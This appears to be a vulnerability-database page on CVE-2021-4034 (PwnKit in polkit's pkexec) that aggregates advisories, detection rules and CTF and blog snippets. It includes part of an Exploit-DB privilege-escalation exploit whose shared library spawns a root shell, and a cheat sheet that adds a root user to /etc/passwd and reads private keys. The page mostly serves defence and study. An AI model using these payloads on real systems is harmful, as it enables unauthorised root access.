CVE-2021-4034
published 2022-01-28CVE-2021-4034: A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users…
PriorityP192high7.8CVSS 3.1
AVLACLPRLUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-07-18
Exploited in the wild
EPSS
94.92%
99.9th percentile
A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.
Affected
80 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | linux | < linux 5.17.3-1 (bookworm) | linux 5.17.3-1 (bookworm) |
| debian | policykit-1 | < policykit-1 0.105-31.1 (bookworm) | policykit-1 0.105-31.1 (bookworm) |
| linux | linux | — | — |
| linux | linux | >= 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 < 41f6ea5b9aaa28b740d47ffe995a5013211fdbb0 | 41f6ea5b9aaa28b740d47ffe995a5013211fdbb0 |
| linux | linux | >= 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 < 98e0c7c702894987732776736c99b85ade6fba45 | 98e0c7c702894987732776736c99b85ade6fba45 |
| linux | linux | >= 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 < b50fb8dbc8b81aaa126387de428f4c42a7c72a73 | b50fb8dbc8b81aaa126387de428f4c42a7c72a73 |
| linux | linux | >= 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 < 1fe82bfd9e4ce93399d815ca458b58505191c3e8 | 1fe82bfd9e4ce93399d815ca458b58505191c3e8 |
| linux | linux | >= 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 < 27a6f495b63a1804cc71be45911065db7757a98c | 27a6f495b63a1804cc71be45911065db7757a98c |
| linux | linux | >= 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 < 1290eb4412aa0f0e9f3434b406dc8e255da85f9e | 1290eb4412aa0f0e9f3434b406dc8e255da85f9e |
| linux | linux | >= 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 < a8054d3fa5deb84b215d6be1b910a978f3cb840d | a8054d3fa5deb84b215d6be1b910a978f3cb840d |
| linux | linux | >= 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 < cfbfff8ce5e3d674947581f1eb9af0a1b1807950 | cfbfff8ce5e3d674947581f1eb9af0a1b1807950 |
| linux | linux | >= 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 < dcd46d897adb70d63e025f175a00a89797d31a43 | dcd46d897adb70d63e025f175a00a89797d31a43 |
| linux | linux_kernel | < 4.9.317 | 4.9.317 |
| linux | linux_kernel | >= 0 < 5.10.113-1 | 5.10.113-1 |
| linux | linux_kernel | >= 0 < 5.17.3-1 | 5.17.3-1 |
| linux | linux_kernel | >= 0 < 5.17.3-1 | 5.17.3-1 |
| linux | linux_kernel | >= 0 < 5.17.3-1 | 5.17.3-1 |
| linux | linux_kernel | >= 4.10 < 4.14.282 | 4.14.282 |
| linux | linux_kernel | >= 4.15 < 4.19.246 | 4.19.246 |
| linux | linux_kernel | >= 4.20 < 5.4.197 | 5.4.197 |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor /var/log/auth.log for suspicious pkexec-related entries when investigating potential CVE-2021-4034 exploitation. ↗
- →CVE-2021-4034 (PwnKit) is actively exploited in the wild by threat actors including perfctl cryptomining malware and nation-state groups (Earth Krahang, CL-STA-0969/Liminal Panda) for Linux privilege escalation — prioritize patching polkit/pkexec on internet-facing Linux systems. ↗
- →The exploit abuses environment variable reintroduction in pkexec to load an attacker-controlled shared library with root privileges — monitor for unexpected shared library loads by pkexec. ↗
- ·The vulnerability exists in all versions of pkexec since its first distribution in 2009 — any unpatched Linux system with polkit installed is affected regardless of whether the polkit daemon is running. ↗
- ·Exploitation does not require the polkit daemon to be running — any unprivileged local user can exploit pkexec even in minimal environments. ↗
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
osv7.8HIGH
vulncheck7.8HIGH
cisa7.8HIGH
vendor_debian7.8HIGH
vendor_msrc7.8HIGH
vendor_oracle7.8HIGH
vendor_redhat7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
kernel: exec: Force single empty string when argv is empty
vendor_redhat·2025-02-26·CVSS 7.8
CVE-2022-49264 [HIGH] kernel: exec: Force single empty string when argv is empty
kernel: exec: Force single empty string when argv is empty
In the Linux kernel, the following vulnerability has been resolved:
exec: Force single empty string when argv is empty
Quoting[1] Ariadne Conill:
"In several other operating systems, it is a hard requirement that the
second argument to execve(2) be the name of a program, thus prohibiting
a scenario where argc < 1. POSIX 2017 also recommends this behaviour,
but it is not an explicit requirement[2]:
The argument arg0 should point to a filename string that is
associated with the process being started by one of the exec
functions.
...
Interestingly, Michael Kerrisk opened an issue about this in 2008[3],
but there was no consensus to support fixing this issue then.
Hopefully now that CVE-2021-4034 shows practical exploitative use[4]
of
Palo Alto
PAN-SA-2024-0013 Informational Bulletin: Impact of OSS CVEs in PAN-OS
vendor_paloalto·2024-11-01·CVSS 9.8
CVE-2017-12424 [CRITICAL] PAN-SA-2024-0013 Informational Bulletin: Impact of OSS CVEs in PAN-OS
PAN-SA-2024-0013 Informational Bulletin: Impact of OSS CVEs in PAN-OS
The Palo Alto Networks Product Security Assurance team has evaluated the following open source software (OSS) CVEs as they relate to PAN-OS software. While PAN-OS software may include the
CVEs: CVE-2017-12424, CVE-2021-3114, CVE-2021-31525, CVE-2021-33195, CVE-2021-33197, CVE-2021-33198, CVE-2021-34558, CVE-2021-36221, CVE-2021-4034, CVE-2021-44716, CVE-2021-44717, CVE-2022-1664, CVE-2022-1705, CVE-2022-23772, CVE-2022-24675, CVE-2022-24921, CVE-2022-28327, CVE-2022-2880, CVE-2022-29526, CVE-2022-30629, CVE-2022-30631, CVE-2022-30632, CVE-2022-32148, CVE-2022-32189, CVE-2022-41715, CVE-2022-41717, CVE-2022-41724, CVE-2022-41725, CVE-2023-24534, CVE-2023-24536, CVE-2023-24539, CVE-2023-29406, CVE-2023-29409, CVE-2023-39
CISA ICS
Siemens SCALANCE, RUGGEDCOM Third-Party
cisa_ics·2023-03-16
Siemens SCALANCE, RUGGEDCOM Third-Party
ICS Advisory
##
Siemens SCALANCE, RUGGEDCOM Third-Party
Release DateMarch 16, 2023
Alert CodeICSA-23-075-01
As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, please see Siemens' ProductCERT Security Advisories (CERT Services | Services | Siemens Global).
## 1. EXECUTIVE SUMMARY
- CVSS v3 9.8
- ATTENTION: Exploitable remotely/Low attack complexity
- Vendor: Siemens
- Equipment: Busybox Applet affecting SCALANCE and RUGGEDCOM products
- Vulnerabilities: Out-of-bounds Write, Exposure of Sensitive Information to an Unauthorized Actor, Improper Locking, Improper Input Validation, NULL Pointer Deref
Oracle
Oracle Oracle Communications Risk Matrix: Platform (Polkit) — CVE-2021-4034
vendor_oracle·2022-10-15·CVSS 7.8
CVE-2021-4034 [HIGH] Oracle Oracle Communications Risk Matrix: Platform (Polkit) — CVE-2021-4034
Oracle Oracle Communications Risk Matrix: Platform (Polkit) vulnerability
CVE: CVE-2021-4034
CVSS: 7.8
Protocol: None
Remote exploit: No
Affected versions: Local
Advisory: cpuoct2022 (OCT 2022)
CISA ICS
Hitachi Energy APM Edge
cisa_ics·2022-09-27·CVSS 7.8
[HIGH] Hitachi Energy APM Edge
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
Hitachi Energy APM Edge
Last RevisedSeptember 27, 2022
Alert CodeICSA-22-270-02
## 1. EXECUTIVE SUMMARY
- CVSS v3 7.8
- ATTENTION: Low attack complexity/public exploits are available
- Vendor: Hitachi Energy
- Equipment: Lumada Asset Performance Management (APM) Edge
- Vulnerabilities: Out-of-Bounds Write and Improper Authentication
## 2. RISK EVALUATION
Successful exploitation of this vulnerability could allow users to escalate privileges from a user account to root.
## 3. TECHNICAL DETAILS
## 3.1 AFFECTED PRODUCTS
The following versions of APM are affected:
- Lumada
CISA
Red Hat Polkit Out-of-Bounds Read and Write Vulnerability
cisa·2022-06-27·CVSS 7.8
CVE-2021-4034 [HIGH] CWE-787 Red Hat Polkit Out-of-Bounds Read and Write Vulnerability
Vulnerability: Red Hat Polkit Out-of-Bounds Read and Write Vulnerability
Affected: Red Hat Polkit
The Red Hat polkit pkexec utility contains an out-of-bounds read and write vulnerability that allows for privilege escalation with administrative rights.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-4034
Remediation Due Date: 2022-07-18
CISA ICS
Siemens SCALANCE LPE 4903 and SINUMERIK Edge
cisa_ics·2022-06-16·CVSS 7.8
[HIGH] Siemens SCALANCE LPE 4903 and SINUMERIK Edge
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
Siemens SCALANCE LPE 4903 and SINUMERIK Edge
Last RevisedJune 16, 2022
Alert CodeICSA-22-167-16
## 1. EXECUTIVE SUMMARY
- CVSS v3 7.8
- ATTENTION: Low attack complexity
- Vendor: Siemens
- Equipment: SCALANCE LPE 4903 and SINUMERIK Edge
- Vulnerability: Out-of-bounds Write
## 2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an unprivileged local user to escalate privileges and gain administrative rights.
## 3. TECHNICAL DETAILS
## 3.1 AFFECTED PRODUCTS
The following products and versions are affected:
- SCALANCE LPE9403: All versions prior t
Ubuntu
PolicyKit vulnerability
vendor_ubuntu·2022-01-25
CVE-2021-4034 PolicyKit vulnerability
Title: PolicyKit vulnerability
Summary: policykit-1 could be made to run programs as an administrator.
It was discovered that the PolicyKit pkexec tool incorrectly handled
command-line arguments. A local attacker could use this issue to escalate
privileges to an administrator.
Instructions: In general, a standard system update will make all the necessary changes.
Ubuntu
PolicyKit vulnerability
vendor_ubuntu·2022-01-25
CVE-2021-4034 PolicyKit vulnerability
Title: PolicyKit vulnerability
Summary: policykit-1 could be made to run programs as an administrator.
USN-5252-1 fixed a vulnerability in policykit-1. This update provides
the corresponding update for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM.
Original advisory details:
It was discovered that the PolicyKit pkexec tool incorrectly handled
command-line arguments. A local attacker could use this issue to escalate
privileges to an administrator.
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
polkit: Local privilege escalation in pkexec due to incorrect handling of argument vector
vendor_redhat·2022-01-25·CVSS 7.8
CVE-2021-4034 [HIGH] CWE-787 polkit: Local privilege escalation in pkexec due to incorrect handling of argument vector
polkit: Local privilege escalation in pkexec due to incorrect handling of argument vector
A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.
Mitigation: For customers who cannot update immediately and doesn
Microsoft
A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users accord
vendor_msrc·2022-01-11·CVSS 7.8
CVE-2021-4034 [HIGH] CWE-125 A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users accord
A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.
FAQ: Is Azure Linux the only Microsoft product that includes this open-source library and is therefore potentially affected by this vulnerability?
One of th
Debian
CVE-2022-49264: linux - In the Linux kernel, the following vulnerability has been resolved: exec: Force...
vendor_debian·2022·CVSS 7.8
CVE-2022-49264 [HIGH] CVE-2022-49264: linux - In the Linux kernel, the following vulnerability has been resolved: exec: Force...
In the Linux kernel, the following vulnerability has been resolved: exec: Force single empty string when argv is empty Quoting[1] Ariadne Conill: "In several other operating systems, it is a hard requirement that the second argument to execve(2) be the name of a program, thus prohibiting a scenario where argc < 1. POSIX 2017 also recommends this behaviour, but it is not an explicit requirement[2]: The argument arg0 should point to a filename string that is associated with the process being started by one of the exec functions. ... Interestingly, Michael Kerrisk opened an issue about this in 2008[3], but there was no consensus to support fixing this issue then. Hopefully now that CVE-2021-4034 shows practical exploitative use[4] of this bug in a shellcode, we can reconsider. This issue is b
Debian
CVE-2021-4034: policykit-1 - A local privilege escalation vulnerability was found on polkit's pkexec utility....
vendor_debian·2021·CVSS 7.8
CVE-2021-4034 [HIGH] CVE-2021-4034: policykit-1 - A local privilege escalation vulnerability was found on polkit's pkexec utility....
A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.
Scope: local
bookworm: resolved (fixed in 0.105-31.1)
bullseye: resolved (fixed in 0.105-31+deb11u1)
forky: resolved (fixed in 0.105-31.1)
sid: resolved (fix
GHSA
GHSA-w8vv-x828-gjpf: In the Linux kernel, the following vulnerability has been resolved:
exec: Force single empty string when argv is empty
Quoting[1] Ariadne Conill:
"
ghsa_unreviewed·2025-10-21·CVSS 7.8
CVE-2022-49264 [HIGH] CWE-476 GHSA-w8vv-x828-gjpf: In the Linux kernel, the following vulnerability has been resolved:
exec: Force single empty string when argv is empty
Quoting[1] Ariadne Conill:
"
In the Linux kernel, the following vulnerability has been resolved:
exec: Force single empty string when argv is empty
Quoting[1] Ariadne Conill:
"In several other operating systems, it is a hard requirement that the
second argument to execve(2) be the name of a program, thus prohibiting
a scenario where argc < 1. POSIX 2017 also recommends this behaviour,
but it is not an explicit requirement[2]:
The argument arg0 should point to a filename string that is
associated with the process being started by one of the exec
functions.
...
Interestingly, Michael Kerrisk opened an issue about this in 2008[3],
but there was no consensus to support fixing this issue then.
Hopefully now that CVE-2021-4034 shows practical exploitative use[4]
of this bug in a shellcode, we can reconsider.
This issue
OSV
CVE-2022-49264: In the Linux kernel, the following vulnerability has been resolved: exec: Force single empty string when argv is empty Quoting[1] Ariadne Conill: "In
osv·2025-02-26·CVSS 7.8
CVE-2022-49264 [HIGH] CVE-2022-49264: In the Linux kernel, the following vulnerability has been resolved: exec: Force single empty string when argv is empty Quoting[1] Ariadne Conill: "In
In the Linux kernel, the following vulnerability has been resolved: exec: Force single empty string when argv is empty Quoting[1] Ariadne Conill: "In several other operating systems, it is a hard requirement that the second argument to execve(2) be the name of a program, thus prohibiting a scenario where argc < 1. POSIX 2017 also recommends this behaviour, but it is not an explicit requirement[2]: The argument arg0 should point to a filename string that is associated with the process being started by one of the exec functions. ... Interestingly, Michael Kerrisk opened an issue about this in 2008[3], but there was no consensus to support fixing this issue then. Hopefully now that CVE-2021-4034 shows practical exploitative use[4] of this bug in a shellcode, we can reconsider. This issue is b
Kernel
exec: Force single empty string when argv is empty
kernel_security·2022-01-31·CVSS 7.8
CVE-2021-4034 [HIGH] exec: Force single empty string when argv is empty
exec: Force single empty string when argv is empty
Quoting[1] Ariadne Conill:
"In several other operating systems, it is a hard requirement that the
second argument to execve(2) be the name of a program, thus prohibiting
a scenario where argc
Reported-by: Michael Kerrisk
Cc: Matthew Wilcox
Cc: Christian Brauner
Cc: Rich Felker
Cc: Eric Biederman
Cc: Alexander Viro
Cc: [email protected]
Cc: [email protected]
Signed-off-by: Kees Cook
Acked-by: Christian Brauner
Acked-by: Ariadne Conill
Acked-by: Andy Lutomirski
Link: https://lore.kernel.org/r/[email protected]
GHSA
GHSA-qgr2-xgqv-24x8: A local privilege escalation vulnerability was found on polkit's pkexec utility
ghsa_unreviewed·2022-01-29
CVE-2021-4034 [HIGH] CWE-125 GHSA-qgr2-xgqv-24x8: A local privilege escalation vulnerability was found on polkit's pkexec utility
A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.
OSV
CVE-2021-4034: A local privilege escalation vulnerability was found on polkit's pkexec utility
osv·2022-01-28·CVSS 7.8
CVE-2021-4034 [HIGH] CVE-2021-4034: A local privilege escalation vulnerability was found on polkit's pkexec utility
A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.
VulnCheck
Red Hat Polkit Out-of-Bounds Read and Write Vulnerability
vulncheck·2021·CVSS 7.8
CVE-2021-4034 [HIGH] CWE-787 Red Hat Polkit Out-of-Bounds Read and Write Vulnerability
Red Hat Polkit Out-of-Bounds Read and Write Vulnerability
The Red Hat polkit pkexec utility contains an out-of-bounds read and write vulnerability that allows for privilege escalation with administrative rights.
Affected: Red Hat Polkit
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/; https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf; https://decoded.avast.
YARA
Linux_Exploit_CVE_2021_4034_1c8f235d
yara·CVSS 7.8
CVE-2021-4034 [HIGH] Linux_Exploit_CVE_2021_4034_1c8f235d
rule Linux_Exploit_CVE_2021_4034_1c8f235d {
meta:
author = "Elastic Security"
id = "1c8f235d-1345-4d5f-a5db-427dbbe6fc9a"
fingerprint = "b145df35499a55e3e920f7701aab3b2f19af9fafbb2e0c1af53cb0b318ad06a6"
creation_date = "2022-01-26"
last_modified = "2022-07-22"
threat_name = "Linux.Exploit.CVE-2021-4034"
reference_sample = "94052c42aa41d0911e4b425dcfd6b829cec8f673bf1245af4050ef9c257f6c4b"
severity = 100
arch_context = "x86"
scan_context = "file"
license = "Elastic License v2"
os = "linux"
strings:
$s1 = "PATH=GCONV_PATH="
$s2 = "pkexec"
condition:
all of them
}
Elastic
Potential Privilege Escalation via PKEXEC
elastic_rules·CVSS 7.8
CVE-2021-4034 [HIGH] Potential Privilege Escalation via PKEXEC
Potential Privilege Escalation via PKEXEC
Identifies an attempt to exploit a local privilege escalation in polkit pkexec (CVE-2021-4034) via unsecure environment
variable injection. Successful exploitation allows an unprivileged user to escalate to the root user.
Query:
file where host.os.type == "linux" and file.path : "/*GCONV_PATH*"
Exploit-DB
PolicyKit-1 0.105-31 - Privilege Escalation
exploitdb·2022-01-27·CVSS 7.8
CVE-2021-4034 [HIGH] PolicyKit-1 0.105-31 - Privilege Escalation
PolicyKit-1 0.105-31 - Privilege Escalation
---
# Exploit Title: PolicyKit-1 0.105-31 - Privilege Escalation
# Exploit Author: Lance Biggerstaff
# Original Author: ryaagard (https://github.com/ryaagard)
# Date: 27-01-2022
# Github Repo: https://github.com/ryaagard/CVE-2021-4034
# References: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
# Description: The exploit consists of three files `Makefile`, `evil-so.c` & `exploit.c`
##### Makefile #####
all:
gcc -shared -o evil.so -fPIC evil-so.c
gcc exploit.c -o exploit
clean:
rm -r ./GCONV_PATH=. && rm -r ./evildir && rm exploit && rm evil.so
#################
##### evil-so.c #####
#include
#include
#include
void gconv() {}
void gconv_init() {
setuid(0);
setgid(0);
setgroups(0);
execve("/bin/sh", NULL, NULL);
}
#########
Metasploit
Local Privilege Escalation in polkits pkexec
metasploit
Local Privilege Escalation in polkits pkexec
Local Privilege Escalation in polkits pkexec
A bug exists in the polkit pkexec binary in how it processes arguments. If the binary is provided with no arguments, it will continue to process environment variables as argument variables, but without any security checking. By using the execve call we can specify a null argument list and populate the proper environment variables. This exploit is architecture independent.
arXiv
Cybersecurity AI: Hacking Consumer Robots in the AI Era
arxiv_fulltext·2026-03-10
Cybersecurity AI: Hacking Consumer Robots in the AI Era
fancy
[L]
[1]#1
4pt
1.2
tabular@lcccccc@
Robot Type & Origin & Category & Attack Surface & Vulns & Assessment Time^* & Impact
Hookii Neomow & China & Outdoor & WiFi, MQTT, ADB, ROS 2 & cai_primary9 & 2.5 hours & Physical + Privacy
Hypershell X & China & Wearable & BLE, REST API, CAN Bus & cai_primary12 & 4 hours & Safety-critical
HOBOT S7 Pro & Taiwan & Indoor & BLE, Cloud API, HTTP & cai_primary17 & 3 hours & Property + Privacy
tabular
=
[
0.5em
## Abstract
Is robot cybersecurity broken by AI? Consumer robots---from autonomous lawnmowers to powered exoskeletons and window cleaners---are rapidly entering homes and workplaces, yet their security remains rooted in assumptions of specialized attacker expertise. This paper presents evidence that Generative AI has fundamentally disr
arXiv
CAM-LDS: Cyber Attack Manifestations for Automatic Interpretation of System Logs and Security Alerts
arxiv_fulltext·2026-03-04
CAM-LDS: Cyber Attack Manifestations for Automatic Interpretation of System Logs and Security Alerts
frontmatter
CAM-LDS: Cyber Attack Manifestations for Automatic Interpretation of System Logs and Security Alerts
Max Landauer, Wolfgang Hotwagner, Thorina Boenke, Florian Skopik, Markus Wurzenberger
organization=Austrian Institute of Technology,
addressline=Center for Digital Safety & Security,
city=Vienna,
postcode=1210,
country=Austria
## Abstract
Log data are essential for intrusion detection and forensic investigations. However, manual log analysis is tedious due to high data volumes, heterogeneous event formats, and unstructured messages. Even though many automated methods for log analysis exist, they usually still rely on domain-specific configurations such as expert-defined detection rules, handcrafted log parsers, or manual feature-engineering. Crucially, the level of automati
CTF
relativity / README
ctf_writeups·2023
relativity / README
# Relativity - idekCTF 2022 (pwn, 13 solved, 494p)
## Introduction
Relativity is a pwn task.
An archive containing a binary and a libc is given.
The libc provided is `Ubuntu GLIBC 2.31-0ubuntu9.9`.
## Reverse engineering
The binary reads the user's input in a buffer on the heap.
The binary makes sure there is at most 2 `n` in the user's input. If it is the
case, it calls `printf` on the buffer, frees it and calls `_Exit` to terminate
the program.
```c
char *buffer = malloc(0x100);
fgets(buffer, 0x100, stdin);
if(NULL != strchr(buffer, 'n')
&& NULL != strchr(strchr(buffer, 'n') + 1, 'n')
&& NULL != strchr(strchr(strchr(buffer, 'n') + 1, 'n') + 1, 'n'))
_Exit(0);
printf(buffer);
free(buffer);
_Exit(0);
```
## Vulnerability
The vulnerability is obviously a format string vulnerability
CTF
pwnkit / README
ctf_writeups·2022·CVSS 7.8
CVE-2021-4034 [HIGH] pwnkit / README
# Pwnkit (CVE-2021-4034)
Alert! It is reported that a classic 0-day vulnerability,
aka [CVE-2021-4034](https://nvd.nist.gov/vuln/detail/CVE-2021-4034),
was found in a setuid binary, called [polkit](https://gitlab.freedesktop.org/polkit/polkit).
Soon after, numerous PoC exploits are developed and spread all over the
Internet (try search!). But no worry, our security response team just deployed
a strong mitigation against these exploitation, long time before
the OSS community came up with [a patch](https://gitlab.freedesktop.org/polkit/polkit/-/commit/a2bf5c9c83b6ae46cbd5c779d3055bff81ded683)! And our patch
seems to prevent all the known PoC on the Internet:
```diff
diff --git a/src/programs/pkexec.c b/src/programs/pkexec.c
index 7698c5c..bc6305e 100644
--- a/src/programs/pkexec.c
+++ b/sr
CTF
cheatsheets / privesc-linux
ctf_writeups
cheatsheets / privesc-linux
---
layout: default
title: "Linux Privesc"
parent: Cheatsheets
grand_parent: Resources
nav_order: 3
permalink: /resources/cheatsheets/privesc-linux/
---
# Linux Privilege Escalation Cheatsheet
Common privesc vectors encountered in HTB machines.
## Quick Wins
```bash
# 1. Sudo misconfiguration
sudo -l
# Check GTFOBins for any allowed binary
# 2. SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Check GTFOBins for any unusual SUID binary
# 3. Writable /etc/passwd
ls -la /etc/passwd
# If writable, add a root user:
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash' >> /etc/passwd
# 4. Readable /etc/shadow
ls -la /etc/shadow
# Copy hashes, crack with hashcat/john
# 5. SSH keys
cat /root/.ssh/id_rsa
cat /home/*/.ssh/id_rsa
find / -name "id_rsa" 2>/dev/null
```
CTF
tryhackme-rooms / redisl33t
ctf_writeups
tryhackme-rooms / redisl33t
# Red
https://tryhackme.com/room/redisl33t
*A classic battle for the ages.* - rated Easy
A pretty fun room! Few twists and turns, nothing too complicated, and similar to my [Hacker vs. Hacker room](https://tryhackme.com/room/hackervshacker) with its simulation of an on-machine adversary looking to bump your shells, though I think this room does it better :)
1. Scanning reveals just two ports, 22 and 80. On 80 is a brochure-ware site, which immediately suggests some form of LFI as its home page is `/index.php?page=home.html`. Further enumeration of the site doesnt reveal anything interesting.
2. The LFI doesn't work with simple payloads, e.g. `?page=/etc/passwd` or `?page=../../../../../etc/passwd`. However, using a php filter like `?page=php://filter/convert.base64-encode/resource=ind
CTF
APTNightmare / README
ctf_writeups
APTNightmare / README
# APTNightmare
> Write-up author: jon-brandy
## Lessons Learned:
1. Analyzed packet capture file using `wireshark`.
2. Reviewing nmap activities and identified open ports. (using small `tshark` foo).
3. Identifying DNS Zone Transfer Activity and compromised subdomain along with credentials used by the threat actor.
4. Using `volatility` to analyze memory dump from a web server (using ubuntu profile).
5. Using `wireshark` and `volatility` to identify command used by the attacker to gain initial access to the web server and what binary is used for privilege escalation.
6. Correlated the technique used with MITRE framework.
7. Listing debian package and extract it's content using `dpkg`.
8. Using `regripper` to parse common registry hives.
9. Identifying and review program execution artifa
Securelist
What’s in the container? Analyzing vulnerabilities, risks and protection with Kaspersky Container Security and the KIRA AI assistant
blogs_securelist·2026-05-29
CVE-2025-55182 What’s in the container? Analyzing vulnerabilities, risks and protection with Kaspersky Container Security and the KIRA AI assistant
Yaroslav Shmelev
Anton Kivva
Denis Parinov
Vladimir Kuskov
Yanina Balandyuk-Opalinskaya
Table of Contents
Introduction
Software vulnerabilities and compromise of update sources
Configuration vulnerabilities
Insecure handling of credentials
Use of default passwords
Passing passwords via command arguments
Privilege escalation in the container
Attacks on sudo
Insecure file permissions
Lack of integrity checks
Conclusion
Authors
Yaroslav Shmelev
Anton Kivva
Denis Parinov
Vladimir Kuskov
Yanina Balandyuk-Opalinskaya
## Introduction
Containerization using Docker has become firmly established in modern development standards, significantly increasing the speed and convenience of deploying various services. Developers often use ready-made Docker images, making only minimal c
Unit42
An Investigation Into Years of Undetected Operations Targeting High-Value Sectors
blogs_unit42·2026-03-06
An Investigation Into Years of Undetected Operations Targeting High-Value Sectors
## An Investigation Into Years of Undetected Operations Targeting High-Value Sectors
Tom Fakterman
Published: March 6, 2026
Malware
Threat Research
CL-UNK-1068
DLL Sideloading
Fast Reverse Proxy
ScanPortPlus
Xnote
## Executive Summary
Since at least 2020, we have observed a cluster of activity targeting high-value organizations across South, Southeast and East Asia. The attacks focus on critical sectors such as aviation, energy, government, law enforcement, pharmaceutical, technology and telecommunications.
Unit 42 is tracking this ongoing, previously undocumented activity as CL-UNK-1068. We designate the term UNK to clusters of activity whose affiliation with either nation-state or cybercrime activity we have not yet determined.
We assess with high confidence that the atta
Unit42
An Investigation Into Years of Undetected Operations Targeting High-Value Sectors
blogs_unit42·2026-03-06
An Investigation Into Years of Undetected Operations Targeting High-Value Sectors
## Executive Summary
Since at least 2020, we have observed a cluster of activity targeting high-value organizations across South, Southeast and East Asia. The attacks focus on critical sectors such as aviation, energy, government, law enforcement, pharmaceutical, technology and telecommunications.
Unit 42 is tracking this ongoing, previously undocumented activity as CL-UNK-1068. We designate the term UNK to clusters of activity whose affiliation with either nation-state or cybercrime activity we have not yet determined.
We assess with high confidence that the attackers behind CL-UNK-1068 are a Chinese threat actor. This assessment is based on the origin of their tools, linguistic artifacts in configuration files, and their consistent, longstanding targeting of critical infrastructure in
Qualys
Mutagen Astronomy: From Discovery to CISA Recognition—A Seven-Year Journey
blogs_qualys·2026-02-02·CVSS 7.8
CVE-2018-14634 [HIGH] Mutagen Astronomy: From Discovery to CISA Recognition—A Seven-Year Journey
## Table of Contents
Introduction
Why This Matters Now
Looking Back: The Original Discovery
Guidance for Security Teams
A Note on Our Research Mission
Conclusion
Frequently Asked Questions (FAQs)
